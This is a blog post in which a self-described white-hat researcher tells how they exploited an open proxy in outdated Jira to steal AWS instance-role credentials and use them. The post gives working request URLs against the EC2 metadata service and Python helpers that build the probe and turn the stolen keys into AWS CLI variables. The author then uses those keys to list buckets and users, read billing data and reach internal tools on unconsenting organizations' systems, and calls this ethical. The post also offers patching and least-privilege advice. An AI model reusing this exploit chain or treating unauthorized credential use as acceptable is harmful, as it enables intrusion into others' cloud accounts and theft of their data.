As our increasingly sophisticated technology creates more and more interconnected systems, the need for strong security is greater than ever. Yet cyber security no longer means just setting up a firewall or antivirus software; it’s a process involving policies, training, compliance, risk assessment and infrastructure. Not having this process in place can lead to serious data loss and reputational damage.

In this article, I’ll introduce the concept of White Hat Hacking and show you how I was able to access an AWS account through an unsecured and outdated Jira machine.

So let’s dive right in!

White Hats vs Black Hats

The Trick to Covering all Bases

Solid security is especially important for Cloud solutions, because your data is constantly flowing from one point to another. If not secured properly, that data can be vulnerable to exploits on its way from endpoint to endpoint.

There are people who want not only to disrupt your website, communications and applications for financial gain, but also to damage your reputation. They operate in the dark, away from the mainstream, and specialize in exploiting loopholes and weak points.

So, the million-dollar question is: where are the weak points in your systems?

The CISO of Société Générale, Stephane Nappo, once said that “one of the main cyber-risks is to think they don’t exist.” It can indeed be tricky to identify the security threat using conventional testing methods, such as unit tests, integration tests, smoke tests and regression tests.

More often than not, those tests – typically conducted from inside your own organization – fail to realistically recreate the conditions faced by someone trying to get in from the outside.

“It takes a thief to catch a thief,” goes the old saying. This is also true in the digital realm. Coupled with a sound security strategy, this principle forms the basis of ethical hacking, also called white hat hacking.

What is White Hat Hacking?

Contrary to common belief, hackers aren’t always malicious!

We generally differentiate between black hat and white hat hackers – all of whom usually have deep knowledge about breaking into computer systems and bypassing security protocols. The difference lies in the intention.

A white hat hacker is a security expert who uncovers security risks in software and reports them to the owner so that the relevant security measures can be put in place; a white hat hacker always operates with good intentions.

What exactly are those intentions? To raise the overall security of your systems.

And then there are the hackers we all know from the movies: black hat hackers. They’re security experts who intend to exploit the security holes they uncover for their own profit – naturally, without prior consent from the system owner. Their primary goal is to extort, destroy reputations and do other nefarious things – I’m sure you’ve seen the headlines.

An Important Piece of the QA Process

It’s a cat-and-mouse game: white hats try to uncover exploitable weaknesses and have them fixed before black hats can take advantage of them.

External white hat hacking should be an essential part of an organization’s QA process, because it closes a gap that internal penetration testers can’t bridge – even if realistic circumstances are simulated. That’s because internal testers typically work within a fixed framework on given assignments and, most importantly, often aren’t personally motivated to dig really deep.

In my role as security researcher, I often put on the old white hat and search the internet for vulnerable software. During my search I’ll find just that – misconfigured machines. The trick lies in finding the owner of a given machine. That’s the key challenge that I – similarly to my counterparts, the black hat hackers – try to solve.

The CTO of one of the companies I helped plug certain security gaps put it like this:

“It’s like you stumble upon a house with an open door, walk right in to check out what’s inside, find a picture of the owner and then you call them and say, hey your stuff is at risk.”

When you do penetration testing from inside an organization, you’ll usually just report vulnerabilities without checking for credentials, because you know who the house belongs to. Yet this is exactly what black hat hackers do – their primary target will often be unknown to them at first. They’ll try everything to find credentials. And when they do, they can begin making a profit.

Like I said, it takes one to know one!

How I Hacked Into an AWS Account

Cyber Cold Case or Current Risk?

On my quest to learn more about effectively securing Cloud solutions, I sometimes do some penetration testing to see how secure a given piece of software is. Usually, I’ll find interesting topics in the cybersecurity subreddit and on Exploit-DB and then decide to explore something in more depth.

On a recent “recon raid”, I went through some old vulnerabilities in Atlassian Software that were already uncovered in 2018 to see if some companies were still vulnerable. Back in 2018, this bug was quite widespread, and many companies scrambled to fix that security gap – but not all, as it turned out.

I started with search engines like Shodan, Censys or BinaryEdge, which constantly scan the internet and index the responses from various ports on all IPs, including signs of known vulnerabilities. During my search, I found multiple machines that were running outdated Jira software.

The thing with Jira versions below v7.3.5 is that they contain a vulnerable open proxy that can be used anonymously to return any data from internal networks.

Let’s assume the Jira server works under the following address:

https://example.com/secure/Dashboard.jspa

So, I knew that Jira in this version contained that bug, but just to make sure, I checked the vulnerable plugin to confirm that the vulnerability still existed in this machine. And it did!



Proof of concept – I tried to open google.com under example.com domain:

https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com
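The request above is nothing more than the plugin path plus a `consumerUri` query parameter naming the page the server should fetch. As a minimal sketch, assuming you are checking a server you own or are authorized to test, the URL can be assembled like this in Python. The function name `build_probe_url` is my own invention for illustration; only the path and the parameter name come from the URL above.

```python
from urllib.parse import urlencode

# Path of the vulnerable OAuth plugin servlet, as it appears in the URL above.
ICON_URI_PATH = "/plugins/servlet/oauth/users/icon-uri"


def build_probe_url(jira_base: str, target: str) -> str:
    """Return the URL that asks the Jira server to fetch `target` on our behalf.

    `build_probe_url` is a hypothetical helper name used for illustration only.
    """
    # Leave ':' and '/' unescaped so the result reads like the URL in the article.
    query = urlencode({"consumerUri": target}, safe=":/")
    return f"{jira_base.rstrip('/')}{ICON_URI_PATH}?{query}"


if __name__ == "__main__":
    print(build_probe_url("https://example.com", "http://google.com"))
```

If the server answers with the content of the target page, the open proxy is still present.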

Then I made sure the machine ran on AWS by checking the DNS name. It showed that this IP belongs to an EC2 instance on AWS, so I was on the right track – and delving deeper into familiar territory.

Digging a Little Deeper

Now, I know that an EC2 instance can query a local address for user data and metadata.

User data is the script that the user provides to the machine to be executed when the machine starts. User data sometimes contains sensitive information.

Metadata, on the other hand, contains details of the EC2 instance like AWS Region, Availability Zone, SSH key name – and when there is any IAM role attached, you can even extract temporary credentials!

The EC2 instance generates these temporary credentials in order to communicate with other AWS services. You can extract them and use them from your local machine.



So that’s what I did! I simply asked for the EC2 metadata.

https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/

Getting to the Meat of it

Depending on the policies used by the role attached to the EC2 instance, you can do different things with it. If a given role only lets you send logs to CloudWatch, you could for example flood CloudWatch with weird data to confuse it and force an instance restart or initiate autoscaling.

But sometimes people make the mistake of not following the principle of least privilege, i.e. they fail to limit a role to just the access it needs to do its job.

So, it could be that a given role has the AdministratorAccess policy attached, and then the Jira instance can be used to do pretty much anything: create, modify and terminate resources, encrypt and decrypt data, access billing details, etc.
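To make the contrast concrete, here is a minimal Python sketch that compares two policy documents. The first mirrors what AdministratorAccess boils down to (allow every action on every resource). The second is a hypothetical log-shipping policy: the log group name `/example/jira` is an assumption of mine, not something taken from the affected account. The helper `grants_full_admin` is likewise illustrative and only catches the bluntest case.

```python
import json

# What the AWS-managed AdministratorAccess policy boils down to.
ADMIN_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

# Hypothetical scoped-down policy: log shipping only, to one assumed log group.
LOGS_ONLY_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
            "Resource": "arn:aws:logs:*:*:log-group:/example/jira:*",
        }
    ],
}


def _as_list(value):
    """IAM allows a single value or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def grants_full_admin(policy: dict) -> bool:
    """True if any Allow statement covers every action on every resource."""
    for statement in _as_list(policy.get("Statement", [])):
        if statement.get("Effect") != "Allow":
            continue
        actions = _as_list(statement.get("Action", []))
        resources = _as_list(statement.get("Resource", []))
        if "*" in actions and "*" in resources:
            return True
    return False


if __name__ == "__main__":
    for name, policy in [("admin", ADMIN_POLICY), ("logs-only", LOGS_ONLY_POLICY)]:
        print(name, grants_full_admin(policy))
        print(json.dumps(policy, indent=2))
```

A check like this will not catch subtler over-grants such as `iam:*`, but it flags the exact situation described here.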



The metadata returned an "iam/" endpoint, which is available only when a role is attached to the instance.





Asking for the temporary role credentials gave me a fresh AWS access key ID, secret access key and session token:

https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/EXT-JIRA-SERVER-1-ROLE


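For readers who haven’t seen this response before, the sketch below shows its general shape and how the three secrets map onto the environment variables the AWS CLI reads. Every value in `SAMPLE_RESPONSE` is a made-up placeholder, and the helper names are mine. Note the `Expiration` field: these credentials are temporary and stop working after that time.

```python
import json
from datetime import datetime, timezone

# Placeholder response; every value here is invented for illustration.
SAMPLE_RESPONSE = """{
  "Code": "Success",
  "LastUpdated": "2020-01-01T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAEXAMPLEEXAMPLE",
  "SecretAccessKey": "example-secret",
  "Token": "example-session-token",
  "Expiration": "2020-01-01T16:00:00Z"
}"""


def to_cli_environment(raw: str) -> dict:
    """Map the metadata response onto the variables the AWS CLI looks for."""
    creds = json.loads(raw)
    return {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],
    }


def is_expired(raw: str, now: datetime) -> bool:
    """True once the temporary credentials have passed their expiration time."""
    expiration = json.loads(raw)["Expiration"]
    expires_at = datetime.strptime(expiration, "%Y-%m-%dT%H:%M:%SZ")
    return now >= expires_at.replace(tzinfo=timezone.utc)


if __name__ == "__main__":
    print(sorted(to_cli_environment(SAMPLE_RESPONSE)))
    print(is_expired(SAMPLE_RESPONSE, datetime.now(timezone.utc)))
```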

It is also good to know the region in which the resources are created, because you need it to use the AWS CLI. The metadata exposes the availability zone, and dropping its trailing letter gives you the region:

https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/placement/availability-zone
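The endpoint returns an availability zone such as `eu-west-1a`, while the CLI wants a region such as `eu-west-1`. A small sketch of that conversion follows. It assumes the standard zone naming (region name plus one trailing letter) and deliberately rejects anything else, for example Local Zone names, rather than guessing.

```python
import re

# Standard zone names look like "<region><letter>", e.g. "eu-west-1a".
_AZ_PATTERN = re.compile(r"([a-z]{2}(?:-[a-z]+)+-\d+)[a-z]")


def region_from_availability_zone(az: str) -> str:
    """Strip the trailing zone letter from a standard availability zone name."""
    match = _AZ_PATTERN.fullmatch(az.strip())
    if match is None:
        raise ValueError(f"unrecognized availability zone format: {az!r}")
    return match.group(1)


if __name__ == "__main__":
    print(region_from_availability_zone("eu-west-1a"))
```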

With all this information, you can use AWS CLI to check what actions are possible using that role.

My script initially simply asked for the S3 Buckets list, the IAM users list and billing information from last month.

All requests were successful. That usually means the role has the AdministratorAccess policy attached, because as a rule only administrators can access billing.

To identify the owner, I additionally asked for AWS Organization details and Route53 domains.

Mischievous Deeds and How to Avoid Them

As mentioned before, the Jira machine gives you access to the internal network it’s located in. All private hosted zones (example.local) are open to you as well.

Other Atlassian applications that may only run in the internal network – like Confluence or Bitbucket – were now open to me. Sometimes no login was even needed, because the application was a local resource and, since I was accessing it through Jira, the system thought I was on the internal network.

With this kind of access, a black hat hacker could:

- create an IAM user for himself,

- create additional access keys for existing users,

- attach admin roles to other vulnerable services,

- copy objects from S3 buckets,

- create AMIs from running instances and start new ones with his keys to log in,

- share AMIs with other AWS accounts,

- remove everything from the account,

- leave the AWS Organization,

- remove CloudTrail logs,

- and more…

The above list illustrates the many options a black hat hacker has to mess with your AWS account. So, what went wrong in this example?

- Broken principle of least privilege – Any user, program, or process should have only the bare minimum privileges needed to perform its function. In this case, the administrator role attached to the EC2 instance gave it unlimited privileges.

- Outdated software – Software updates can include new or improved features and better compatibility with other devices and applications. But more importantly, they also provide security fixes. In this case, it was a well-known exploit from 2018 that allowed the sensitive information to be extracted this easily. Atlassian fixed it a long time ago, but users who haven’t patched their applications are still vulnerable.

Vulnerable apps & versions:

- Bamboo < 6.0.0

- Confluence < 6.1.3

- Jira < 7.3.5

- Bitbucket < 4.14.4

- Crowd < 2.11.2

- Crucible & Fisheye < 4.3.2
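If you run any of these products, a quick comparison against the list tells you whether you are affected. The sketch below is one way to do that in Python. The thresholds are copied from the list above; the function names and the assumption that versions are plain dotted numbers (optionally prefixed with "v") are mine.

```python
# First non-vulnerable versions, copied from the list above.
FIXED_IN = {
    "bamboo": (6, 0, 0),
    "confluence": (6, 1, 3),
    "jira": (7, 3, 5),
    "bitbucket": (4, 14, 4),
    "crowd": (2, 11, 2),
    "crucible": (4, 3, 2),
    "fisheye": (4, 3, 2),
}


def parse_version(text: str) -> tuple:
    """Turn '7.3' or 'v7.3.5' into a 3-part tuple of ints, padding with zeros."""
    parts = [int(p) for p in text.strip().lstrip("vV").split(".")]
    parts += [0] * (3 - len(parts))
    return tuple(parts)


def is_vulnerable(product: str, version: str) -> bool:
    """True if `version` is older than the first fixed release of `product`."""
    return parse_version(version) < FIXED_IN[product.lower()]


if __name__ == "__main__":
    for product, version in [("Jira", "7.2.0"), ("Jira", "7.13.0"), ("Crowd", "2.11.2")]:
        print(product, version, is_vulnerable(product, version))
```

Comparing tuples of integers rather than strings matters here: as text, "7.13.0" would sort before "7.3.5" and be flagged incorrectly.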

Money well Spent, but not well Secured

Among the long list of leaked access keys I found, some gave me access to accounts spending nearly $100,000 a month on AWS.

Here’s a breakdown of the costs incurred, taken from the billing information:

Monthly Spending on AWS in $

- AWS CloudTrail: 0.00

- AWS Config: 66.92

- AWS Direct Connect: 25.25

- AWS Glue: 0.00

- AWS IoT: 0.00

- AWS Key Management Service: 45.80

- AWS Lambda: 298.20

- AWS Secrets Manager: 0.00

- Amazon DynamoDB: 24.94

- Amazon EC2 Container Registry (ECR): 0.06

- Amazon EC2 Container Service: 0.00

- Amazon ElastiCache: 1,041.44

- EC2 – Other: 6,976.19

- Amazon Elastic Compute Cloud – Compute: 61,008.41

- Amazon Elastic File System: 3.61

- Amazon Elastic Load Balancing: 2,020.69

- Amazon Elasticsearch Service: 1,686.58

- Amazon Kinesis: 145.08

- Amazon Relational Database Service: 2,270.92

- Amazon Route 53: 1,148.44

- Amazon Simple Email Service: 2.67

- Amazon Simple Notification Service: 0.01

- Amazon Simple Queue Service: 0.00

- Amazon Simple Storage Service: 1,770.76

- Amazon SimpleDB: 0.00

- Amazon Translate: 0.08

- Amazon Virtual Private Cloud: 559.91

- Amazon CloudWatch: 345.10

- Tax: 7,673.75

- TOTAL MONTHLY SPENDING ON AWS: $87,114.84

As you can see, this company is using a lot of AWS resources. However, their security measures could definitely be improved!

Finding the Owners

There are a few ways to find the responsible organization. Here are some methods I frequently use to find identities.

- Domain name from SSL Certificate

- Domains from Route53 hosted zones

- Domain names from S3 buckets list

- Email addresses on IAM users list

- First name, Last name from IAM users list -> LinkedIn

- URLs/Logos on Jira login page

- AWS Organization master payer account root email

- AWS account root user email

- Responsible disclosure email address from contact page

- Data protection email address from privacy page

Summary

After finding the owners of the Jira machine, I contacted them to inform them of the gap in their security. They said that my discovery truly shocked them and the vulnerability was immediately fixed.

They also said they would introduce some changes in their cloud security policies and reassess their access management.

It’s good practice to thank the person for the responsible disclosure with a Bug Bounty – a reward given to a security researcher for highlighting security issues. It motivates the researcher to continue their work of helping companies create tighter security processes.

Unfortunately, there was no bug bounty this time!

So, what can you do to avoid exposing your data in the way described above?

- Apply the principle of least privilege – This would reduce the risk of unauthorized access to critical systems or sensitive data through low-level user accounts, devices or applications.

- Update your software regularly – Besides new features and greater compatibility, tighter security is a main component of software updates.

On this note, I will leave you with another quote. This time it’s from the great American writer Henry David Thoreau, straight out of his magnum opus, Walden.

“If you have built castles in the air, your work need not be lost; that is where they should be. Now put the foundations under them.”